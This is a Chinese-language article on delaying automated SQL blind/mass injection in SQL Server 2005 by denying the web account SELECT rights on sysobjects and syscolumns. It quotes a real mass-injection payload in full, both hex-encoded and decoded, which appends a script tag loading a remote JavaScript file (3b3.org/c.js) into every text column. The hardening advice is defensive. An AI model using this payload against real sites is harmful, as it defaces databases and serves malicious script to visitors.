延緩SQL盲注與SQL Server的許可權(圖)

 

來源：WAS

所謂SQL盲注也就是採用自動化的程式來自動的掃描注入點，並可以自動掃描資料表進行大規模批量注入，其危害性也最大。

這裡我們來探討一種與SQL Server許可權有關的延緩SQL盲注的方法。

一般來說SQL盲注的最終注入代碼都類似於如下片段（SQL Server 2000/2005）：

DeCLaRE @S NvArCHaR(4000);SeT @S=CaSt(0x4400650063006C006100720065002000400054002000560061007200630068006100720028003200   3500350029002C0040004300200056006100720063006800610072002800320035003500290020004400650063   006C0061007200650020005400610062006C0065005F0043007500720073006F00720020004300750072007300   6F007200200046006F0072002000530065006C00650063007400200041002E004E0061006D0065002C0042002E   004E0061006D0065002000460072006F006D0020005300790073006F0062006A00650063007400730020004100   2C0053007900730063006F006C0075006D006E00730020004200200057006800650072006500200041002E0049   0064003D0042002E0049006400200041006E006400200041002E00580074007900700065003D00270075002700   200041006E0064002000280042002E00580074007900700065003D003900390020004F007200200042002E0058   0074007900700065003D003300350020004F007200200042002E00580074007900700065003D00320033003100   20004F007200200042002E00580074007900700065003D00310036003700290020004F00700065006E00200054   00610062006C0065005F0043007500720073006F00720020004600650074006300680020004E00650078007400   2000460072006F006D00200020005400610062006C0065005F0043007500720073006F007200200049006E0074   006F002000400054002C004000430020005700680069006C006500280040004000460065007400630068005F00   5300740061007400750073003D0030002900200042006500670069006E00200045007800650063002800270075   007000640061007400650020005B0027002B00400054002B0027005D00200053006500740020005B0027002B0   0400043002B0027005D003D0052007400720069006D00280043006F006E0076006500720074002800560061007   20063006800610072002800380030003000300029002C005B0027002B00400043002B0027005D00290029002B   00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F003300   620033002E006F00720067002F0063002E006A0073003E003C002F007300630072006900700074003E00270027   00270029004600650074006300680020004E006500780074002000460072006F006D0020002000540061006200   6C0065005F0043007500720073006F007200200049006E0074006F002000400054002C0040004300200045006E0   06400200043006C006F007300650020005400610062006C0065005F0043007500720073006F007200200044006   50061006C006C006F00630061007400650020005400610062006C0065005F0043007500720073006F007200   aS NvArChAR(4000));ExEc(@S);--

解密後就是下面片段：

Declare @T Varchar(255),@C Varchar(255) Declare Table_Cursor Cursor For Select A.Name,B.Name From <strong>Sysobjects</strong> A,<strong>Syscolumns</strong> B Where A.Id=B.Id And A.Xtype=’u’ And (B.Xtype=99 Or B.Xtype=35 Or B.Xtype=231 Or B.Xtype=167) Open Table_Cursor Fetch Next From  Table_Cursor Into @T,@C While(@@Fetch_Status=0) Begin Exec(’update [’+@T+’] Set [’+@C+’]=Rtrim(Convert(Varchar(8000),[’+@C+’]))+’’<strong>《script src=ｈｔｔｐ：／／３ｂ３．ｏｒｇ／ｃ．ｊｓ</strong><strong>》《/script》</strong>’’’) Fetch Next From  Table_Cursor Into @T,@C End Close Table_Cursor Deallocate Table_Cursor

其中的Script符號我替換掉了。

同樣可以看到當中我用粗體標註出來的表名sysobjects，syscolumns。SQL盲注就是利用這兩個系統資料表來進行遍曆的。

所以暫時延緩SQL盲注的方法就是將程式中訪問資料庫的帳號（注意：絕對不要用預設的sa許可權，而建議你為你的Web應用程式單獨建立需要的訪問帳號）移除掉對於這幾個系統資料表的存取權限即可避免盲注（我特意註明是盲注，因為注入點還是存在，只是延緩掉SQL盲注而已）。

比如你Web應用程式訪問資料庫的帳號為tnt001，要禁止掉的對於系統資料表sysobjects，syscolumns的存取權限的方法如下：

SQL Server 2000比較直觀簡單，而SQL Server 2005開始就完全重構了整個系統架構，有一定不同，所以這裡以SQL Server 2005為例來詳細說明（SQL Server 2008類似）：

Step 1: 選擇某一個具體的資料庫，點擊節點“安全性”->“使用者”，然後選擇你需要的帳號比如tnt001，右鍵選擇屬性

Step 2：選擇屬性頁面的左側的“安全性實體”

Step 3: 點擊 安全性實體 下的“添加”按鈕，選擇“屬性類別型的所有對象”

 

Step 4：選擇“視圖”,並選擇其中的sysobjects,syscolumns

Step 5：將選定的幾個視圖的“Select”許可權選定為 拒絕

點擊確定即可.

用帳號tnt001串連，然後訪問sysobjects測試會得到拒絕訪問的提示：

“拒絕了對對象 ’sysobjects’ (資料庫 ‘mssqlsystemresource’，架構 ’sys’)的 SELECT 許可權。”

上面的方式只是延緩了SQL盲注，因為大規模批量注入都是程式自動進行的，這種方法也就是屏蔽掉了程式對於此類SQL Server資料庫的盲注攻擊，但是SQL注入點還是依然存在的，如果是人工在得到相關資訊的情況下進行注入，還是無法避免的，治本還是需要從來源程式入手 徹底修改掉。

但往往由於實際情況中，涉及到SQL注入漏洞的來源程式非常龐雜，代碼需要Review的量很大，這種延緩SQL盲注的方法也就為你徹底排查並修改掉有漏洞的程式贏得了一定的時間。